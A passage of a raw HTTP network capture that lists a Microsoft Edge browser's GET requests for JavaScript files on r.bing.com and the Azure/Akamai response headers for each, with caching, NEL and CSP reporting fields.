etag: 0x8DBD98F7B10D87C
akamai-grn: 0.458a4917.1708348895.38fa6da3
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-type: text/javascript; charset=utf-8
content-md5: quQTT+6Soa5ABxdPT728sg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: ce03e2da-801e-0067-3fce-2df0ad000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 147
vary: Accept-Encoding
cache-control: public, no-transform, max-age=111238
expires: Fri, 01 Mar 2024 22:25:47 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d94f
timing-allow-origin: *
-
Remote address:92.123.128.139:443RequestGET /rp/45oaVkgLq8mr5mvzpRSIJZ8SBLk.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: dPxPxNhWxDr9nwycfNgOqA==
last-modified: Tue, 30 Jan 2024 10:30:34 GMT
etag: 0x8DC217E7E16F745
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 1151c297-e01e-0015-304d-5c5299000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 8637
cache-control: public, no-transform, max-age=368135
expires: Mon, 04 Mar 2024 21:47:24 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d950
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/Y_vP5bket1OE26V4d4L4FHDnP4w.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: LHlO4nRtwKZ9MhNV0Suo9Q==
last-modified: Tue, 21 Nov 2023 09:33:11 GMT
etag: 0x8DBEA74E13DCCF1
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: bf0f46d8-a01e-0012-6f3d-289b81000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 615
cache-control: public, no-transform, max-age=320011
expires: Mon, 04 Mar 2024 08:25:20 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d951
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/hulMy94NWe4P3UsIN3zt_iGS9n8.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: RTvqgqhZtCizK7UasStM/Q==
last-modified: Fri, 15 Dec 2023 07:16:35 GMT
etag: 0x8DBFD3DC59F1CE7
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6c18f80c-c01e-0066-3d11-3faf71000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 429
vary: Accept-Encoding
cache-control: public, no-transform, max-age=321778
expires: Mon, 04 Mar 2024 08:54:47 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d952
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/lDSK5WXW01RCyGzCzzxdJDFYfO0.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: jkM0tiboOol+liDILPR2oQ==
last-modified: Fri, 23 Feb 2024 00:27:16 GMT
etag: 0x8DC3406301EEED6
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2b87c6a5-701e-0091-6a2b-662098000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=274008
expires: Sun, 03 Mar 2024 19:38:37 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d953
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/gGRPwribt8XPTQXpd2zkMD5o04w.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: I/KVjWbAxZXfBeLqiVYi3w==
last-modified: Mon, 14 Aug 2023 05:58:20 GMT
etag: 0x8DB9C8B763711CF
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6b9056a7-701e-0097-31b9-29b65c000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 542
cache-control: public, no-transform, max-age=55857
expires: Fri, 01 Mar 2024 07:02:46 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d954
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/b1tGfF7YW1vyypumVmyY7dmizYA.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: GePb+Oba1X8/VWU16WO5nQ==
last-modified: Tue, 13 Feb 2024 22:27:02 GMT
etag: 0x8DC2CE2E671D9DA
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: c29eae37-801e-0013-7f3d-5f6126000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=84076
expires: Fri, 01 Mar 2024 14:53:05 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d955
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/X9zPQVZQzKFTYze2B2WNn1LJCS4.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: TLwZhqYro/p02/6N++ZW5g==
last-modified: Wed, 17 Aug 2022 06:10:11 GMT
etag: 0x8DA801724C37354
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 8c6606c2-501e-00bf-7a26-2fd7f4000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 189
vary: Accept-Encoding
cache-control: public, no-transform, max-age=275408
expires: Sun, 03 Mar 2024 20:01:57 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d956
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/XvPs3zdtm8Xfl-ujR40Xu7FW0LI.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: CSVeibf2oORAtuBGI1XXTQ==
last-modified: Wed, 17 Aug 2022 06:10:38 GMT
etag: 0x8DA801734A12D29
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 9eca3a48-501e-00cd-2a51-32d0bb000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 448
cache-control: public, no-transform, max-age=238456
expires: Sun, 03 Mar 2024 09:46:05 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d957
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/QGgDCAP4Fmzft4oE0wUK8k18tLI.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DB744BE50CFEC8
akamai-grn: 0.65361602.1708884418.aa6b5f5
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-type: text/javascript; charset=utf-8
content-md5: 44o2tTwS4KoUgwvtwZ6Jew==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 02ce8f5d-d01e-00a1-1d3e-2f3b2c000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 1679
vary: Accept-Encoding
cache-control: public, no-transform, max-age=72959
expires: Fri, 01 Mar 2024 11:47:48 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d958
timing-allow-origin: *
-
Remote address:92.123.128.139:443RequestGET /rp/BDwYWcRQC1NNdqbnczZFTEPNiGk.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: hkZjeVUwULvbE8ZXxuIgow==
last-modified: Fri, 07 Jul 2023 21:37:22 GMT
etag: 0x8DB7F325916D082
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 3ae5ed5d-901e-0036-66a2-3e6d21000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 2142
akamai-grn: 0.9b777b5c.1708634060.533a65af
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=227886
expires: Sun, 03 Mar 2024 06:49:55 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d95c
timing-allow-origin: *
-
Remote address:92.123.128.139:443RequestGET /rp/8aj_I6fSAQ2HauP0CPPAfDwa2j8.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: DXeqkh2i/zZTwJ5wkgDOdw==
last-modified: Wed, 17 Aug 2022 05:19:49 GMT
etag: 0x8DA80101B450355
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 1108240b-801e-0077-7f1f-f135c5000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 339
cache-control: public, no-transform, max-age=141421
expires: Sat, 02 Mar 2024 06:48:50 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d95d
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/LTCT2zdUcB3ayDDUpC7BI5zxXuE.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DA8013DF63F8CE
akamai-grn: 0.65361602.1707349682.194a6e5c
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-type: text/javascript; charset=utf-8
content-md5: Jc7Bnfc4/wV22XT5OjPjLg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: a8c1ff5c-b01e-0043-4f54-02060d000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 566
akamai-grn: 0.42fd4817.1707549953.b6f95ae
vary: Accept-Encoding
cache-control: public, no-transform, max-age=60347
expires: Fri, 01 Mar 2024 08:17:36 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d95e
timing-allow-origin: *
-
Remote address:92.123.128.139:443RequestGET /rs/7b/t5/jnc,nj/2RFgnacsz6nPw9vvxd8AGFyaQr8.js?or=w HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/x-javascript; charset=utf-8
server: Kestrel
access-control-allow-headers: *
access-control-allow-origin: *
content-encoding: br
last-modified: Wed, 23 Jun 2021 13:17:08 GMT
x-eventid: 65df2471558c431a9c18665abe1a6e86
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
x-as-instrumentationoptions: AppServerLoggingMaster=1
x-as-machinename: DUBEEAP0000E0D3
x-as-suppresssetcookie: 1
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-/je0YrXOseKBoFoIetFRWLYAhERuAy6WGsIXeXl25IY='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingrms"}]}
cross-origin-resource-policy: cross-origin
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.5}
cache-control: public, max-age=333921
expires: Mon, 04 Mar 2024 12:17:10 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d95f
timing-allow-origin: *
-
Remote address:92.123.128.139:443RequestGET /rp/HdiojNH85n4iu87NAQvDH5bKMnM.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: xGpjcATT83Cyo4MSw4SamQ==
last-modified: Wed, 17 Aug 2022 05:38:18 GMT
etag: 0x8DA8012B05BBF3C
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: b4dacd9e-c01e-0066-7b73-31af71000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 205
cache-control: public, no-transform, max-age=58259
expires: Fri, 01 Mar 2024 07:42:48 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d961
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/ciI4DrhPUNmhXgxM4MW52bFXjfw.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: fMBsXBRhBUHF2Rf6fCUYAA==
last-modified: Fri, 30 Dec 2022 13:25:58 GMT
etag: 0x8DAEA696315E8B1
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 9fa3f4e0-e01e-0093-2889-529e20000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 1787
vary: Accept-Encoding
cache-control: public, no-transform, max-age=107704
expires: Fri, 01 Mar 2024 21:26:53 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d99e
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/ukaQhuYQyTz3agbHIeyBRoBxhmE.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: 23TmYuT8+5YKCS19QgXMXg==
last-modified: Thu, 30 Nov 2023 03:07:16 GMT
etag: 0x8DBF151750F1E8C
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2abf459b-601e-00b4-21d9-2c2c9f000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 996
cache-control: public, no-transform, max-age=315443
expires: Mon, 04 Mar 2024 07:09:12 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d99f
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/WPedHfV8dQrn4qkif5azDZSqmn8.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: 1Rf0xX8VNREaPigiNASk/Q==
last-modified: Wed, 17 Aug 2022 06:08:21 GMT
etag: 0x8DA8016E370A675
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2ffcb99f-901e-0019-672b-0060ea000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 632
cache-control: public, no-transform, max-age=189653
